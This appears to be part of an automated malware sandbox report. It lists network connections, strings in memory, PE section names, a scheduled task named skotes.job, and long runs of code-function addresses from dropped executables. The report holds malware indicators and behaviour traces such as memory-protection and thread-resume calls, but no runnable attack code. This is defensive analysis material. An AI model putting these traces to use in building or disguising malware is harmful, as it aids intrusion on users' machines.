Source: firefox.exe, 0000001C.00000002.2980852938.000001DEE03BB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2980852938.000001DEE03F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2955897457.000001C8C37B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2952085761.000001C8C3734000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964244095.000001D14E954000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2950099066.000001D14E630000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2954944692.000001729E534000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49927 version: TLS 1.2

System Summary

Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FieldCalculator.cs Large array initialization: ValidateIntegratedCalculator: array initializer size 361008
Source: 6e1fbaaba5.exe, 0000000F.00000002.2740020659.00000000002F2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_8af1e4f5-e
Source: 6e1fbaaba5.exe, 0000000F.00000002.2740020659.00000000002F2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_00cfdb3c-4
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name:
Source: 98a7b9f337.exe.6.dr Static PE information: section name:
Source: 98a7b9f337.exe.6.dr Static PE information: section name: .idata
Source: 98a7b9f337.exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: a6f0d09f38.exe.6.dr Static PE information: section name:
Source: a6f0d09f38.exe.6.dr Static PE information: section name: .idata
Source: a6f0d09f38.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: b5da647ae3.exe.6.dr Static PE information: section name:
Source: b5da647ae3.exe.6.dr Static PE information: section name: .idata
Source: b5da647ae3.exe.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: 8b82d73f70.exe.6.dr Static PE information: section name:
Source: 8b82d73f70.exe.6.dr Static PE information: section name: .idata
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06536E50 NtProtectVirtualMemory, 7_2_06536E50
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06538F98 NtResumeThread, 7_2_06538F98
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06536E48 NtProtectVirtualMemory, 7_2_06536E48
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06538F90 NtResumeThread, 7_2_06538F90
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00728860 6_2_00728860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00727049 6_2_00727049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_007278BB 6_2_007278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00722D10 6_2_00722D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006E4DE0 6_2_006E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_007231A8 6_2_007231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00717F36 6_2_00717F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006E4B30 6_2_006E4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0072779B 6_2_0072779B
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158CB3C 7_2_0158CB3C
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158F3B8 7_2_0158F3B8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158F3A8 7_2_0158F3A8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C18430 7_2_05C18430
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1E740 7_2_05C1E740
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1A1A0 7_2_05C1A1A0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1B208 7_2_05C1B208
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1B1F8 7_2_05C1B1F8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1A190 7_2_05C1A190
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C11068 7_2_05C11068
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C10E71 7_2_05C10E71
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1F948 7_2_05C1F948
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C10B90 7_2_05C10B90
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C10BA0 7_2_05C10BA0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_05C1EA67 7_2_05C1EA67
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E77B4 7_2_061E77B4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E5530 7_2_061E5530
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E5540 7_2_061E5540
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F4A68 7_2_061F4A68
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F3788 7_2_061F3788
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F63CB 7_2_061F63CB
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F4A20 7_2_061F4A20
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F4A58 7_2_061F4A58
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FB6B8 7_2_061FB6B8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FB6A7 7_2_061FB6A7
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F3778 7_2_061F3778
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F003A 7_2_061F003A
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FF830 7_2_061FF830
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F0040 7_2_061F0040
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FA553 7_2_061FA553
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FA560 7_2_061FA560
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_063C001E 7_2_063C001E
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_063C0040 7_2_063C0040
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06536BC8 7_2_06536BC8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06533570 7_2_06533570
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06536BB9 7_2_06536BB9
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06533560 7_2_06533560
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06630040 7_2_06630040
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06630023 7_2_06630023
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0664DD70 7_2_0664DD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E212E8 8_2_06E212E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E212F8 8_2_06E212F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E23FA8 8_2_06E23FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E23F45 8_2_06E23F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E248F0 8_2_06E248F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 8_2_06E24900 8_2_06E24900
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642F643 13_2_0642F643
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F6E38 13_2_063F6E38
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641DE56 13_2_0641DE56
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641CE5E 13_2_0641CE5E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641966D 13_2_0641966D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642EE75 13_2_0642EE75
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640D678 13_2_0640D678
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DDE07 13_2_063DDE07
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F267F 13_2_063F267F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F1679 13_2_063F1679
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642D608 13_2_0642D608
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FD663 13_2_063FD663
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06418627 13_2_06418627
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640B636 13_2_0640B636
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064036CB 13_2_064036CB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F7EAF 13_2_063F7EAF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06408EE6 13_2_06408EE6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640EEEB 13_2_0640EEEB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641D6F5 13_2_0641D6F5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E56F7 13_2_063E56F7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642469E 13_2_0642469E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640469F 13_2_0640469F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064206A6 13_2_064206A6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F5ED5 13_2_063F5ED5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640CEBB 13_2_0640CEBB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641E747 13_2_0641E747
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642C75A 13_2_0642C75A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06426F5D 13_2_06426F5D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06400F65 13_2_06400F65
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063ECF19 13_2_063ECF19
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642D776 13_2_0642D776
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E7708 13_2_063E7708
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641677A 13_2_0641677A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FE702 13_2_063FE702
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640F70A 13_2_0640F70A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640970B 13_2_0640970B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06425F09 13_2_06425F09
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F076E 13_2_063F076E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EFF6C 13_2_063EFF6C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EAF63 13_2_063EAF63
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06419F20 13_2_06419F20
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06422F24 13_2_06422F24
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E9F4D 13_2_063E9F4D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FA745 13_2_063FA745
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642F7C3 13_2_0642F7C3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06410FC3 13_2_06410FC3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FCFB6 13_2_063FCFB6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640BFDD 13_2_0640BFDD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640D7E5 13_2_0640D7E5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06414FE9 13_2_06414FE9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641F7F4 13_2_0641F7F4
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E5FF8 13_2_063E5FF8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06413F86 13_2_06413F86
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FF7ED 13_2_063FF7ED
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EA7EB 13_2_063EA7EB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06423F9C 13_2_06423F9C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EF43D 13_2_063EF43D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06429C41 13_2_06429C41
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06411451 13_2_06411451
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641EC56 13_2_0641EC56
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640DC67 13_2_0640DC67
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EA417 13_2_063EA417
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641440F 13_2_0641440F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641B415 13_2_0641B415
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FB469 13_2_063FB469
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641341A 13_2_0641341A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641C425 13_2_0641C425
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FF4AF 13_2_063FF4AF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064104D3 13_2_064104D3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E5C9B 13_2_063E5C9B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EB49B 13_2_063EB49B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EEC98 13_2_063EEC98
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06403CEB 13_2_06403CEB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F2C8B 13_2_063F2C8B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E6C85 13_2_063E6C85
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06424C93 13_2_06424C93
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064304A3 13_2_064304A3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642DCA0 13_2_0642DCA0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06409CA3 13_2_06409CA3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642E4AF 13_2_0642E4AF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064254B0 13_2_064254B0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642ECBA 13_2_0642ECBA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064294BE 13_2_064294BE
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FED3B 13_2_063FED3B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641A548 13_2_0641A548
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F3D24 13_2_063F3D24
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F551D 13_2_063F551D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06408504 13_2_06408504
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EFD57 13_2_063EFD57
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06427D33 13_2_06427D33
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E7D4A 13_2_063E7D4A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F1546 13_2_063F1546
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642CD39 13_2_0642CD39
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640AD3F 13_2_0640AD3F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06421D3D 13_2_06421D3D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06415DC5 13_2_06415DC5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06407DD3 13_2_06407DD3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640DDD7 13_2_0640DDD7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FBDA7 13_2_063FBDA7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641F5DD 13_2_0641F5DD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06418DE0 13_2_06418DE0
